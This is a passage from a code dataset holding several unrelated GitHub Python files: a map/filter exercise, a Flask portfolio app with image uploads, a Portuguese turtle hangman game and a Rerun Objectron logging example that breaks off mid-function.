tf.app.run()\n\n\n\n\n\n\n\n","repo_name":"punkideas/audio-style-transfer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"30093224571","text":"import unittest\n\n# Lets build on what we did last week in discussion section :-)\nstarter = [1, 3, 6, 11, 5, 8, 7, 2, 9]\n\n# ---- Task 1a ----\n# Write a funtion squareFunc takes a number as a paramter and returns the square of the number\n# ----- Your Code Starts Here -----\ndef squareFunc(x):\n\treturn x*x\n\n\n# ---- Task 1b -----\n# Map function takes 2 parameters - a function object, and a sequence\n# i.e. it is invoked like this -> map(aFunction, aSequence)\n# Use squareFunc as first parameter in map function, and the list starter as second parameter\n# Store the result returned by map function in a variable square_fn\n# ----- Your Code Starts Here -----\nsquare_fn = map(squareFunc,starter)\nprint (type(square_fn))\n\n\n# # ---- Task 1c ----\n# # Write a lambda function that does the same thing as squareFunc\n# # and use the lambda function in place of squareFunc.\n# # Store the result returned by map function in a variable square_la\n# # ----- Your Code Starts Here -----\nsquare_la = map(lambda x: x*x,starter)\nprint (square_la)\n\nfor i in range(len(starter)):\n\tprint(next(square_fn))\nresultlist = list(square_fn)\n\nprint(resultlist)\n\n\n# # ---- Task 1d ----\n# # Cast square_la to a list square_lst\n# # ----- Your Code Starts Here -----\nsquare_lst = list(square_la)\n\n\n# # ---- Task 2a ----\n# # Since map function works on sequences, lets try it on a string.\n# # First, write a function flippingCase which takes a character\n# # and returns it in uppercase if the character is lowercase\n# # else returns it in lowercase if the character is uppercase\n# # Hint : You can use str.isUpper(), str.isLower(), str.upper(), str.lower() if needed\n# # ----- Your Code Starts Here -----\ndef flippingCase(x):\n\tif x.isupper():\n\t\ta = x.lower()\n\telse:\n\t\ta = x.upper()\n\treturn a\t\t\n\n# # ---- Task 2b ----\n# # Use the function flippingCase and the string 'I Am Camel Case' as parameters for map function\n# # Store the result in variable confusedCase\n# # ----- Your Code Starts Here -----\n# confusedCase =\nconfusedCase = map(flippingCase,'I Am Camel Case')\n\n# # ---- Task 2c ----\n# # Cast confusedCase to a list confusedList\n# # ----- Your Code Starts Here -----\nconfusedList = list(confusedCase)\n\n\n# # ---- Task 2d ----\n# # Write a lambda function that does the exact thing as flippingCase, and use it in the map function\n# # Store the result in confusedCaseAgain\n# # HINT : Think about how you had written if in list comprehensions\n# # ----- Your Code Starts Here -----\nconfused = 
(lambda x: x.lower() if x.isupper() else x.upper())\nconfusedCaseAgain = map(confused, 'I Am Camel Case')\nprint (confusedCaseAgain == confusedCase)\n\n# # ---- Task 2e ----\n# # Cast confusedCaseAgain to a list confusedListAgain\n# # ----- Your Code Starts Here -----\nconfusedListAgain = list(confusedCaseAgain)\n# # ---- Task 3a ----\n# # Time to do some filtering!\n# # Filter function takes same parameters as map function - a function object and a sequence\n# # First write a function lowercaseOnly that returns a character only if it is lowercase, else returns None\n# # ----- Your Code Starts Here -----\n\ndef lowercaseonly(x):\n\tif x.islower():\n\t\treturn x\n\telse:\n\t\treturn None\t\n\n\n# # ---- Task 3b ----\n# # Use function lowercaseOnly and confusedListAgain as parameters of filter function\n# # and filter all lowercase letters\n# # Store the result in lowercase_filter.\n# # ----- Your Code Starts Here -----\nlowercase_filter = filter(lowercaseonly,confusedListAgain)\n\n# # ---- Task 3c ----\n# # Cast lowercase_filter to lowercase_list\n# # ----- Your Code Starts Here -----\nlowercase_list = list(lowercase_filter)\nprint (lowercase_list)\n\n# # ---- Task 3d ----\n# # Use lambda function to do the exact same thing as lowercaseOnly\n# # Use this function as a parameter in filter function\n# # Now instead of storing the result of filter function in a variable, cast it to list directly\n# # Assign the final list to variable lowercase_list_la\n# # ----- Your Code Starts Here -----\n# lowercase_list_la = []\n","repo_name":"miabonanno/RandomUploads","sub_path":"wee11_notests.py","file_name":"wee11_notests.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
{"seq_id":"32586238500","text":"import os\nimport urllib.request\nfrom flask import Flask, render_template, request, redirect, url_for\nfrom werkzeug.utils import secure_filename\nimport csv\n\napp = Flask(__name__)\n\n@app.route('/')\ndef return_home():\n    return render_template(\"index.html\")\n\n@app.route('/about')\ndef return_about():\n    return render_template(\"about.html\")\n\n@app.route('/index')\ndef return_index():\n    return render_template(\"index.html\")\n\ndef return_users():\n    with open('data/users.csv', mode='r') as file:\n        data = csv.DictReader(file, delimiter=',')\n        user = [] \n        for row in data:\n            user.append({\n                \"fname\": row[\"firstName\"],\n                \"lname\": row[\"lastName\"],\n                \"bio\": row[\"bio\"],\n                \"imgFile\": row[\"imgFile\"]\n            })\n    return user\n\n@app.route('/portfolio')\ndef return_form():\n    users = []\n    users = return_users()\n    return render_template(\"portfolio.html\", users=users) \n\napp.config[\"IMAGE_UPLOADS\"] = '/Users/chantelngoh/Desktop/SBU/Github/JACT/static/images'\napp.config[\"ALLOWED_IMAGE_EXTENSIONS\"] = [\"PNG\", \"JPG\", \"JPEG\", \"GIF\"]\n\ndef allowed_image(filename):\n    if not \".\" in filename:\n        return False\n    ext = filename.rsplit(\".\", 1)[1]\n    if ext.upper() in app.config[\"ALLOWED_IMAGE_EXTENSIONS\"]:\n        return True\n    else:\n        return False\n\n@app.route(\"/upload-image\", methods=[\"GET\", \"POST\"])\ndef upload_image():\n\n    if request.method == \"POST\":\n        if request.files:\n            image = request.files[\"image\"]\n\n            if image.filename == \"\":\n                print(\"Image must have a filename\")\n                return redirect(request.url)\n\n            if not allowed_image(image.filename):\n                print(\"That image extension is not allowed\")\n                return redirect(request.url)\n\n            else:\n                filename = secure_filename(image.filename)\n
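                # save the upload under its sanitized name into the configured uploads directory\n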
                image.save(os.path.join(app.config[\"IMAGE_UPLOADS\"], filename))\n\n            print(\"Image saved\")\n            return redirect(request.url)\n\n    return render_template(\"portfolio.html\")\n\n@app.route('/newUser', methods=[\"GET\", \"POST\"])\ndef new_form():\n    if request.method == \"GET\":\n        return redirect(url_for('newUser'))\n    elif request.method == \"POST\":\n        userdata = dict(request.form)\n        fname = userdata[\"fname\"]\n        lname = userdata[\"lname\"]\n        bio = userdata[\"bio\"]\n        lines = list()\n        isTaken = False\n        users = []\n\n        with open('data/users.csv', mode='r') as readFile:\n            reader = csv.DictReader(readFile, delimiter=',')\n            for row in reader:\n                lines.append(row)\n            for r in range(len(lines)):\n                if fname == lines[r][\"firstName\"] and lname == lines[r][\"lastName\"]:\n                    isTaken = True\n\n        if( len(fname) < 1 or len(lname) < 1 or len(bio) < 1 ):\n            users = return_users()\n            return render_template(\"portfolio.html\", users=users, status='Please resubmit with valid information.') \n\n        elif( isTaken == True ):\n            users = return_users()\n            return render_template(\"portfolio.html\", users=users, info='This name is already taken.') \n\n        else:\n            if request.files:\n                image = request.files[\"image\"]\n                if image.filename == \"\":\n                    users = return_users()\n                    return render_template(\"portfolio.html\", users=users, image_status='Please submit an image.') \n                if not allowed_image(image.filename):\n                    users = return_users()\n                    return render_template(\"portfolio.html\", users=users, image_status='That image extension is not allowed.') \n                else:\n                    filename = secure_filename(image.filename)\n                    ext = filename.rsplit(\".\", 1)[1]\n                    new_filename = fname + \"-\" + lname + \".\" + ext\n                    image.save(os.path.join(app.config[\"IMAGE_UPLOADS\"], new_filename))\n\n            with open('data/users.csv', mode='a', newline='') as file:\n                data = csv.writer(file)\n                data.writerow([fname, lname, bio,new_filename]) \n            users = []\n            users = return_users()\n            return render_template(\"portfolio.html\", users=users) \n\n@app.route('/portfolio', methods=[\"GET\", \"POST\"])\ndef delete_form():\n    if request.method == \"GET\":\n        return render_template(\"portfolio.html\") \n    elif request.method == \"POST\":\n        userdata = dict(request.form)\n        fullname = userdata[\"delete-btn\"] \n        fname = fullname.rsplit(\"-\", 1)[0]\n        lname = fullname.rsplit(\"-\", 1)[1]\n        lines = list()\n        with open('data/users.csv', mode='r') as readFile:\n            reader = csv.DictReader(readFile, delimiter=',')\n            for row in reader:\n                lines.append(row)\n            # keep every row except the user being deleted (the original 'lines.remove(row)' removed the wrong row)\n            lines = [line for line in lines if not (fname == line[\"firstName\"] and lname == line[\"lastName\"])]\n            arrImages = os.listdir(app.config[\"IMAGE_UPLOADS\"])\n            for img in arrImages:\n                filename = img.rsplit(\".\", 1)[0]\n                if filename == fullname:\n                    os.remove(app.config[\"IMAGE_UPLOADS\"] + '/' + img)\n\n        with open('data/users.csv', mode='w') as writeFile:\n            writer = csv.writer(writeFile) \n            writer.writerow([\"firstName\", \"lastName\", \"bio\", \"imgFile\"]) \n            for r in range(len(lines)):\n                firstName = lines[r][\"firstName\"]\n                lastName = lines[r][\"lastName\"]\n                bio = lines[r][\"bio\"] \n                imgFile = lines[r][\"imgFile\"] \n                writer.writerow([firstName, lastName, bio, imgFile])\n        users = []\n        users = return_users() \n        return render_template(\"portfolio.html\", users=users)\n\n@app.route('/open', methods=[\"GET\", \"POST\"])\ndef open_form():\n    if request.method == \"GET\":\n        return render_template(\"portfolio.html\") \n    elif request.method == \"POST\":\n        userdata = dict(request.form)\n        fullname = userdata[\"open-btn\"] \n        fname =
 fullname.rsplit(\"-\", 1)[0]\n        lname = fullname.rsplit(\"-\", 1)[1] \n        lines = list()\n        with open('data/users.csv', mode='r') as readFile:\n            reader = csv.DictReader(readFile, delimiter=',')\n            for row in reader:\n                lines.append(row)\n            # keep only the selected user's row (the original 'lines.remove(row)' removed the wrong entries)\n            lines = [line for line in lines if fname == line[\"firstName\"] and lname == line[\"lastName\"]]\n        return render_template(\"user-page.html\", thisUser=lines)\n\nif __name__ == '__main__':\n    app.run(debug = True)","repo_name":"amaraim22/JACT","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
{"seq_id":"15647149947","text":"import turtle\nfrom random import shuffle\nimport unicodedata\nimport time\n\n\ndef nome_jogo(turtle):\n\tturtle.setpos(20,230)\n\tturtle.write('Jogo da Forca', font=('Arial',20,'bold'))\n\tturtle.home()\n\ndef desenho_forca(turtle, window_comprimento):\n\tcoordenada_x1 = (window_comprimento/-2)+30\n\tturtle.setpos(coordenada_x1,-200)\n\tturtle.pendown()\n\tturtle.forward(150)\n\tturtle.right(90)\n\tturtle.forward(25)\n\tturtle.right(90)\n\tturtle.forward(150)\n\tturtle.right(90)\n\tturtle.forward(25)\n\tturtle.penup()\n\tcoordenada_x2 = (window_comprimento/-2)+105\n\tturtle.setpos(coordenada_x2,-200)\n\tturtle.pendown()\n\tturtle.forward(250)\n\tturtle.right(90)#(-245,150)\n\tturtle.forward(100)\n\tturtle.right(90)#(-145,150)\n\tturtle.forward(25)\n\tturtle.penup()\n\tturtle.left(90)#(-145,125)\n\tturtle.home()\n\ndef desenho_cabeca (turtle, window_comprimento):\n\tcoordenada_x = (window_comprimento/-2)+205\n\tturtle.setpos(coordenada_x,25)\n\tturtle.left(180)\n\tturtle.pendown()\n\tturtle.fillcolor('yellow')\n\tturtle.begin_fill()\n\tturtle.circle(25)\n\tturtle.end_fill()\n\tturtle.fillcolor('black')\n\tturtle.penup()\n\tturtle.left(180)\n\tturtle.home()\n\ndef desenho_dorso(turtle, window_comprimento):\n\tcoordenada_x = (window_comprimento/-2)+205\n\tturtle.setpos(coordenada_x,-25)\n\tturtle.right(90)\n\tturtle.pendown()\n\tturtle.forward(80)\n\tturtle.penup()\n\tturtle.left(90)\n\tturtle.home()\n\ndef desenho_left_arm(turtle, window_comprimento):\n\tcoordenada_x = (window_comprimento/-2)+205\n\tturtle.setpos(coordenada_x,-25)\n\tturtle.right(135)\n\tturtle.pendown()\n\tturtle.forward(60)\n\tturtle.penup()\n\tturtle.left(135)\n\tturtle.home()\n\ndef desenho_right_arm(turtle, window_comprimento):\n\tcoordenada_x = (window_comprimento/-2)+205\n\tturtle.setpos(coordenada_x,-25)\n\tturtle.right(45)\n\tturtle.pendown()\n\tturtle.forward(60)\n\tturtle.penup()\n\tturtle.left(45)\n\tturtle.home()\n\ndef desenho_left_leg(turtle, window_comprimento):\n\tcoordenada_x = (window_comprimento/-2)+205\n\tturtle.setpos(coordenada_x,-105)\n\tturtle.right(120)\n\tturtle.pendown()\n\tturtle.forward(65)\n\tturtle.penup()\n\tturtle.left(120)\n\tturtle.home()\n\ndef desenho_right_leg(turtle, window_comprimento):\n\tcoordenada_x = (window_comprimento/-2)+205\n\tturtle.setpos(coordenada_x,-105)\n\tturtle.right(60)\n\tturtle.pendown()\n\tturtle.forward(65)\n\tturtle.penup()\n\tturtle.left(60)\n\tturtle.home()\n\ndef desenho_espacos(turtle, letras_palavra, window_comprimento):\n\tposicoes_letras = []\n\tespace = 0\n\tcoordenada_x = (window_comprimento/2)-30\n\tturtle.setpos(coordenada_x,-225)\n\tturtle.left(180)\n\tturtle.pensize(3)\n\tfor i in letras_palavra:\n\t\tif i == ' ':\n\t\t\tturtle.forward(35)\n\t\t\tposicoes_letras.append([turtle.pos(),i])\n\t\t\tespace += 1\n\t\telse:\n\t\t\tturtle.pendown()\n\t\t\tturtle.forward(30)\n\t\t\tturtle.penup()\n\t\t\tturtle.forward(5)\n\t\t\tposicoes_letras.append([turtle.pos(),i])\n\t
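# restore the default pen size (5, as set in caneta_setup) after drawing the letter slots\n\t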
turtle.pensize(5)\n\tturtle.left(180)\n\tturtle.home()\n\tposicoes_letras.reverse()\n\treturn posicoes_letras, espace\n\ndef desenho_letras(turtle, palavra, posicoes_letras, escolha, window_comprimento, acertos):\n\ttext1 = str(unicodedata.normalize('NFKD',palavra).encode('ASCII','ignore'))\n\tno_accent = text1[2:len(text1)-1] \n\t\n\tcoordenada_x = (window_comprimento/-2)+erros*20\n\tindex_acertos = []\n\terro = 0\n\tt = 0\n\n\tif escolha in no_accent:\n\t\tfor x,e in enumerate(no_accent):\n\t\t\tif escolha == e:\n\t\t\t\tindex_acertos.append(x)\n\t\t\telse:\n\t\t\t\tNone\n\t\tfor i in index_acertos:\n\t\t\tif i in acertos:\n\t\t\t\tt += 1\n\t\t\telse:\n\t\t\t\tNone\n\t\twhile t != 0:\n\t\t\tindex_acertos.pop()\n\t\t\tt -= 1\n\t\tfor i in index_acertos:\n\t\t\tturtle.setpos((posicoes_letras[i][0][0])+15,(posicoes_letras[i][0][1]))\n\t\t\tturtle.write(posicoes_letras[i][1], font=('Arial',20,'bold'))\n\t\t\tturtle.home()\n\telse:\n\t\terro = 1\n\t\tturtle.setpos(coordenada_x+30,-255)\n\t\tturtle.write(escolha, font=('Arial',18,'bold'))\n\t\tturtle.home()\n\treturn erro, index_acertos\n\ndef caneta_setup ():\n\tcaneta.hideturtle()\n\tcaneta.speed(100)\n\tcaneta.penup()\n\tcaneta.color('Black')\n\tcaneta.pensize(5)\n\ndef setup_window(comprimento):\n\tif comprimento <= 500:\n\t\tcomprimento += 80\n\t\twindow.setup(width=comprimento,height=600,startx=None,starty=None)\n\telif comprimento > 500 and comprimento <= 650:\n\t\tcomprimento += 30\n\t\twindow.setup(width=comprimento,height=600,startx=None,starty=None)\n\telif comprimento > 650 and comprimento <= 800:\n\t\tcomprimento -= 30\n\t\twindow.setup(width=comprimento,height=600,startx=None,starty=None)\n\telif comprimento > 800 and comprimento <= 1000:\n\t\tcomprimento -= 110\n\t\twindow.setup(width=comprimento,height=600,startx=None,starty=None)\n\telse:\n\t\tcomprimento -= 250\n\t\twindow.setup(width=comprimento,height=600,startx=None,starty=None)\n\ndef body_maker(erros):\n\tif erros == 1:\n\t\tdesenho_cabeca(caneta, window.window_width())\n\telif erros == 2:\n\t\tdesenho_dorso(caneta, window.window_width())\n\telif erros == 3:\n\t\tdesenho_left_arm(caneta, window.window_width())\n\telif erros == 4:\n\t\tdesenho_right_arm(caneta, window.window_width())\n\telif erros == 5:\n\t\tdesenho_left_leg(caneta, window.window_width())\n\telif erros == 6:\n\t\tdesenho_right_leg(caneta, window.window_width())\n\t\tcaneta.setpos(-100,100)\n\t\tcaneta.write('You lose', font=('Arial',18,'bold'))\n\t\tcaneta.setpos(-130,70)\n\t\tcaneta.write('Number of errors: all', font=('Arial',14,'bold'))\n\t\ttime.sleep(2)\n\t\treturn True\n\ndef repor_desenho(turtle, posicoes_letras, acertos, erros):\n\t\n\tfor i in acertos:\n\t\tif i == ' ':\n\t\t\tNone\n\t\telse:\n\t\t\tturtle.setpos((posicoes_letras[i][0][0])+15,(posicoes_letras[i][0][1]))\n\t\t\tturtle.write(posicoes_letras[i][1], font=('Arial',20,'bold'))\n\t\t\tturtle.home()\n\t\n\tif erros == 1:\n\t\tdesenho_cabeca(caneta, window.window_width())\n\telif erros == 2:\n\t\tdesenho_cabeca(caneta, window.window_width())\n\t\tdesenho_dorso(caneta, window.window_width())\n\telif erros == 3:\n\t\tdesenho_cabeca(caneta, window.window_width())\n\t\tdesenho_dorso(caneta, window.window_width())\n\t\tdesenho_left_arm(caneta, window.window_width())\n\telif erros == 4:\n\t\tdesenho_cabeca(caneta, window.window_width())\n\t\tdesenho_dorso(caneta, window.window_width())\n\t\tdesenho_left_arm(caneta, window.window_width())\n\t\tdesenho_right_arm(caneta, window.window_width())\n\telif erros == 5:\n\t\tdesenho_cabeca(caneta, window.window_width())\n\t\tdesenho_dorso(caneta, window.window_width())\n\t\tdesenho_left_arm(caneta, window.window_width())\n\t\tdesenho_right_arm(caneta, window.window_width())\n\t\tdesenho_left_leg(caneta, window.window_width())\n\telse:\n\t\t
None\n\n\n'''\n-------------------------------------------------------------------------------\n'''\n\n\nwindow = turtle.Screen() # x limits: +-330, y limits: +-270\nwindow.bgcolor('lightblue')\nwindow.title('Jogo da Forca')\n\n\ncaneta = turtle.Turtle()\ncaneta_setup()\n\nwhile True:\n\tlista_palavras = [] \n\tL = open('entrada.txt','r+',encoding='utf-8')\n\n\tfor i in L.readlines():\n\t\ts = i.lower().strip()\n\t\tif s == '':\n\t\t\tNone\n\t\telse:\n\t\t\tlista_palavras.append(s)\n\tL.close()\n\t\n\t\n\t\n\twhile lista_palavras != []:\n\t\t\n\t\tshuffle(lista_palavras)\n\t\tpalavra = lista_palavras[int(len(lista_palavras)/2)]\n\t\tdel lista_palavras[int(len(lista_palavras)/2)]\n\t\t\n\t\tletras_palavra = [] \n\t\t\n\t\tfor i in palavra:\n\t\t\tletras_palavra.append(i)\n\t\tletras_palavra.reverse()\n\t\t\n\t\tcomprimento = (len(letras_palavra)*35)*2\n\t\t\n\t\tsetup_window(comprimento)\n\t\tnome_jogo(caneta)\n\t\tdesenho_forca(caneta, window.window_width())\n\t\t\n\t\t\n\t\tescolha = ''\n\t\terros = 0\n\t\tacertos = []\n\t\t\n\t\tposicoes_letras,e = desenho_espacos(caneta, letras_palavra, window.window_width())\n\t\tfor i in range(e):\n\t\t\tacertos.append(' ')\n\t\t\n\t\twhile True:\n\t\t\tpalpite = window.textinput('','Choose a letter or guess the word')\n\t\t\t\n\t\t\t\n\t\t\tif palpite == None:\n\t\t\t\tcaneta.setpos(-175,100)\n\t\t\t\tcaneta.write('Player gave up. Come back anytime.', font=('Arial',18,'bold'))\n\t\t\t\ttime.sleep(2)\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tescolha = palpite.lower()\n\t\t\t\ttext1 = str(unicodedata.normalize('NFKD',palavra).encode('ASCII','ignore'))\n\t\t\t\tno_accent = text1[2:len(text1)-1]\n\t\t\t\tif escolha == no_accent or escolha == palavra:\n\t\t\t\t\tcaneta.setpos(-100,100)\n\t\t\t\t\tcaneta.write('You win', font=('Arial',18,'bold'))\n\t\t\t\t\tcaneta.setpos(-100,70)\n\t\t\t\t\tcaneta.write('Number of errors: {0}'.format(erros), font=('Arial',14,'bold'))\n\t\t\t\t\ttime.sleep(2)\n\t\t\t\t\tdecisao = window.textinput('Jogo da Forca','Do you want to continue? (answer yes or no)')\n\t\t\t\t\tif decisao == 'yes':\n\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\tpalpite = None\n\t\t\t\t\t\tbreak\n\t\t\t\telif escolha.isalpha() and len(escolha) == 1:\n\t\t\t\t\tmiddle = str(unicodedata.normalize('NFKD',escolha).encode('ASCII','ignore'))\n\t\t\t\t\tescolha_no_accent = middle[2:len(middle)-1]\n\t\t\t\t\t\n\t\t\t\t\ts,a = desenho_letras(caneta, palavra, posicoes_letras, escolha_no_accent, window.window_width(), acertos)\n\t\t\t\t\t\n\t\t\t\t\terros += s\n\t\t\t\t\t\n\t\t\t\t\tif a == []:\n\t\t\t\t\t\tNone\n\t\t\t\t\telse:\n\t\t\t\t\t\tfor i in a:\n\t\t\t\t\t\t\tacertos.append(i)\n\t\t\t\t\tprint(acertos)\n\t\t\t\t\tprint()\n\t\t\t\t\t\n\t\t\t\t\tp = body_maker(erros)\n\t\t\t\t\tif p == True:\n\t\t\t\t\t\tdecisao = window.textinput('Jogo da Forca','Do you want to continue? (answer yes or no)')\n\t\t\t\t\t\tif decisao == 'yes':\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tpalpite = None\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\tif len(acertos) == len(palavra):\n\t\t\t\t\t\tcaneta.setpos(-100,100)\n\t\t\t\t\t\tcaneta.write('You win', font=('Arial',18,'bold'))\n\t\t\t\t\t\tcaneta.setpos(-100,70)\n\t\t\t\t\t\tcaneta.write('Number of errors: {0}'.format(erros), font=('Arial',14,'bold'))\n\t\t\t\t\t\ttime.sleep(2)\n\t\t\t\t\t\tdecisao = window.textinput('Jogo da Forca','Do you want to continue?
 (answer yes or no)')\n\t\t\t\t\t\tif decisao == 'yes':\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tpalpite = None\n\t\t\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tcaneta.setpos(-95,100)\n\t\t\t\t\tcaneta.write('Invalid choice.', font=('Arial',18,'bold'))\n\t\t\t\t\ttime.sleep(2)\n\t\t\tcaneta.reset()\n\t\t\tcaneta_setup()\n\t\t\t\n\t\t\tnome_jogo(caneta)\n\t\t\tdesenho_forca(caneta, window.window_width())\n\t\t\tdesenho_espacos(caneta, letras_palavra, window.window_width())\n\t\t\trepor_desenho(caneta, posicoes_letras, acertos, erros)\n\t\tcaneta.reset()\n\t\twindow.reset()\n\t\tcaneta_setup()\n\t\tif palpite == None:\n\t\t\tcaneta.setpos(-95,0)\n\t\t\tcaneta.write('Click to Exit', font=('Arial',18,'bold'))\n\t\t\tcaneta.home()\n\t\t\tbreak\n\tif palpite == None:\n\t\tbreak\nwindow.exitonclick()\n","repo_name":"IgneousGuikas/RodrigoGikas_EP2","sub_path":"Exercicio Jogo da Forca(10).py","file_name":"Exercicio Jogo da Forca(10).py","file_ext":"py","file_size_in_byte":12228,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
{"seq_id":"12991151451","text":"#!/usr/bin/env python3\n\"\"\"\nExample of using the Rerun SDK to log the Objectron dataset.\n\nExample: `examples/python/objectron/main.py --recording chair`\n\"\"\"\nfrom __future__ import annotations\n\nimport argparse\nimport logging\nimport math\nimport os\nimport sys\nimport time\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Iterable, Iterator\n\nimport numpy as np\nimport numpy.typing as npt\nimport rerun as rr # pip install rerun-sdk\nfrom download_dataset import (\n    ANNOTATIONS_FILENAME,\n    AVAILABLE_RECORDINGS,\n    GEOMETRY_FILENAME,\n    IMAGE_RESOLUTION,\n    LOCAL_DATASET_DIR,\n    ensure_recording_available,\n)\nfrom proto.objectron.proto import ARCamera, ARFrame, ARPointCloud, FrameAnnotation, Object, ObjectType, Sequence\nfrom scipy.spatial.transform import Rotation as R\n\n\n@dataclass\nclass SampleARFrame:\n    \"\"\"An `ARFrame` sample and the relevant associated metadata.\"\"\"\n\n    index: int\n    timestamp: float\n    dirpath: Path\n    frame: ARFrame\n    image_path: Path\n\n\ndef read_ar_frames(\n    dirpath: Path, num_frames: int, run_forever: bool, per_frame_sleep: float\n) -> Iterator[SampleARFrame]:\n    \"\"\"\n    Loads up to `num_frames` consecutive ARFrames from the given path on disk.\n\n    `dirpath` should be of the form `dataset/bike/batch-8/16/`.\n    \"\"\"\n\n    path = dirpath / GEOMETRY_FILENAME\n    print(f\"loading ARFrames from {path}\")\n\n    time_offset = 0\n    frame_offset = 0\n\n    while True:\n        frame_idx = 0\n        data = Path(path).read_bytes()\n        while len(data) > 0 and frame_idx < num_frames:\n            next_len = int.from_bytes(data[:4], byteorder=\"little\", signed=False)\n            data = data[4:]\n\n            frame = ARFrame().parse(data[:next_len])\n            img_path = Path(os.path.join(dirpath, f\"video/{frame_idx}.jpg\"))\n            yield SampleARFrame(\n                index=frame_idx + frame_offset,\n                timestamp=frame.timestamp + time_offset,\n                dirpath=dirpath,\n                frame=frame,\n                image_path=img_path,\n            )\n\n            data = data[next_len:]\n            frame_idx += 1\n\n        if run_forever and per_frame_sleep > 0.0:\n            time.sleep(per_frame_sleep)\n\n        if run_forever:\n            time_offset += frame.timestamp\n            frame_offset += frame_idx\n        else:\n            break\n\n\ndef read_annotations(dirpath: Path) -> Sequence:\n    \"\"\"\n    Loads the annotations from the given path on disk.\n\n    `dirpath` should be of the form `dataset/bike/batch-8/16/`.\n    \"\"\"\n\n    path = dirpath / ANNOTATIONS_FILENAME\n    print(f\"loading annotations from {path}\")\n    data = Path(path).read_bytes()\n\n    seq = Sequence().parse(data)\n\n    return seq\n\n\ndef log_ar_frames(samples: Iterable[SampleARFrame], seq: Sequence) -> None:\n    \"\"\"Logs a 
stream of `ARFrame` samples and their annotations with the Rerun SDK.\"\"\"\n\n rr.log(\"world\", rr.ViewCoordinates.RIGHT_HAND_Y_UP, timeless=True)\n\n log_annotated_bboxes(seq.objects)\n\n frame_times = []\n for sample in samples:\n rr.set_time_sequence(\"frame\", sample.index)\n rr.set_time_seconds(\"time\", sample.timestamp)\n frame_times.append(sample.timestamp)\n\n rr.log(\"world/camera\", rr.ImageEncoded(path=sample.image_path))\n log_camera(sample.frame.camera)\n log_point_cloud(sample.frame.raw_feature_points)\n\n log_frame_annotations(frame_times, seq.frame_annotations)\n\n\ndef log_camera(cam: ARCamera) -> None:\n \"\"\"Logs a camera from an `ARFrame` using the Rerun SDK.\"\"\"\n\n X = np.asarray([1.0, 0.0, 0.0])\n Z = np.asarray([0.0, 0.0, 1.0])\n\n world_from_cam = np.asarray(cam.transform).reshape((4, 4))\n translation = world_from_cam[0:3, 3]\n intrinsics = np.asarray(cam.intrinsics).reshape((3, 3))\n rot = R.from_matrix(world_from_cam[0:3, 0:3])\n (w, h) = (cam.image_resolution_width, cam.image_resolution_height)\n\n # Because the dataset was collected in portrait:\n swizzle_x_y = np.asarray([[0, 1, 0], [1, 0, 0], [0, 0, 1]])\n intrinsics = swizzle_x_y @ intrinsics @ swizzle_x_y\n rot = rot * R.from_rotvec((math.tau / 4.0) * Z)\n (w, h) = (h, w)\n\n rot = rot * R.from_rotvec((math.tau / 2.0) * X) # TODO(emilk): figure out why this is needed\n\n rr.log(\n \"world/camera\",\n rr.Transform3D(translation=translation, rotation=rr.Quaternion(xyzw=rot.as_quat())),\n )\n rr.log(\n \"world/camera\",\n rr.Pinhole(\n resolution=[w, h],\n image_from_camera=intrinsics,\n camera_xyz=rr.ViewCoordinates.RDF,\n ),\n )\n\n\ndef log_point_cloud(point_cloud: ARPointCloud) -> None:\n \"\"\"Logs a point cloud from an `ARFrame` using the Rerun SDK.\"\"\"\n\n positions = np.array([[p.x, p.y, p.z] for p in point_cloud.point]).astype(np.float32)\n identifiers = point_cloud.identifier\n rr.log(\"world/points\", rr.Points3D(positions, instance_keys=identifiers, colors=[255, 255, 255, 255]))\n\n\ndef log_annotated_bboxes(bboxes: Iterable[Object]) -> None:\n \"\"\"Logs all the bounding boxes annotated in an `ARFrame` sequence using the Rerun SDK.\"\"\"\n\n for bbox in bboxes:\n if bbox.type != ObjectType.BOUNDING_BOX:\n print(f\"err: object type not supported: {bbox.type}\")\n continue\n\n rot = R.from_matrix(np.asarray(bbox.rotation).reshape((3, 3)))\n rr.log(\n f\"world/annotations/box-{bbox.id}\",\n rr.Boxes3D(\n half_sizes=0.5 * np.array(bbox.scale),\n centers=bbox.translation,\n rotations=rr.Quaternion(xyzw=rot.as_quat()),\n colors=[160, 230, 130, 255],\n labels=bbox.category,\n ),\n timeless=True,\n )\n\n\ndef log_frame_annotations(frame_times: list[float], frame_annotations: list[FrameAnnotation]) -> None:\n \"\"\"Maps annotations to their associated `ARFrame` then logs them using the Rerun SDK.\"\"\"\n\n for frame_ann in frame_annotations:\n frame_idx = frame_ann.frame_id\n if frame_idx >= len(frame_times):\n continue\n\n time = frame_times[frame_idx]\n rr.set_time_sequence(\"frame\", frame_idx)\n rr.set_time_seconds(\"time\", time)\n\n for obj_ann in frame_ann.annotations:\n keypoint_ids = [kp.id for kp in obj_ann.keypoints]\n keypoint_pos2s = np.asarray([[kp.point_2d.x, kp.point_2d.y] for kp in obj_ann.keypoints], dtype=np.float32)\n # NOTE: These are normalized points, so we need to bring them back to image space\n keypoint_pos2s *= IMAGE_RESOLUTION\n\n if len(keypoint_pos2s) == 9:\n log_projected_bbox(f\"world/camera/estimates/box-{obj_ann.object_id}\", keypoint_pos2s)\n else:\n for id, pos2 
